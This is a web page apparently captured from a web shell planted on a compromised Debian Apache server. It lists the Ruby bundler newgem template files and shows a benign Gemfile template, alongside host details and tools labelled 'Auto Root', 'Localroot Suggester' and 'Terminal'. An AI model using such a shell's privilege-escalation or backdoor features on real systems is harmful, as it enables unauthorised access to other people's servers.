Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
ruby /
3.1.0 /
bundler /
templates /
newgem /
Delete
Unzip
Name
Size
Permission
Date
Action
bin
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
circleci
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
exe
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
ext
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
github
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
lib
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
sig
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
spec
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
test
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
CHANGELOG.md.tt
80
B
-rw-r--r--
2022-04-12 11:11
CODE_OF_CONDUCT.md.tt
5.1
KB
-rw-r--r--
2022-04-12 11:11
Gemfile.tt
527
B
-rw-r--r--
2022-04-12 11:11
LICENSE.txt.tt
1.08
KB
-rw-r--r--
2022-04-12 11:11
README.md.tt
2.37
KB
-rw-r--r--
2022-04-12 11:11
Rakefile.tt
1.24
KB
-rw-r--r--
2022-04-12 11:11
gitignore.tt
228
B
-rw-r--r--
2022-04-12 11:11
gitlab-ci.yml.tt
165
B
-rw-r--r--
2022-04-12 11:11
newgem.gemspec.tt
1.81
KB
-rw-r--r--
2022-04-12 11:11
rspec.tt
53
B
-rw-r--r--
2022-04-12 11:11
rubocop.yml.tt
299
B
-rw-r--r--
2022-04-12 11:11
standard.yml.tt
184
B
-rw-r--r--
2022-04-12 11:11
travis.yml.tt
126
B
-rw-r--r--
2022-04-12 11:11
Save
Rename
# frozen_string_literal: true source "https://rubygems.org" # Specify your gem's dependencies in <%= config[:name] %>.gemspec gemspec gem "rake", "~> 13.0" <%- if config[:ext] -%> gem "rake-compiler" <%- end -%> <%- if config[:test] -%> gem "<%= config[:test] %>", "~> <%= config[:test_framework_version] %>" <%- end -%> <%- if config[:linter] == "rubocop" -%> gem "rubocop", "~> <%= config[:linter_version] %>" <%- elsif config[:linter] == "standard" -%> gem "standard", "~> <%= config[:linter_version] %>" <%- end -%>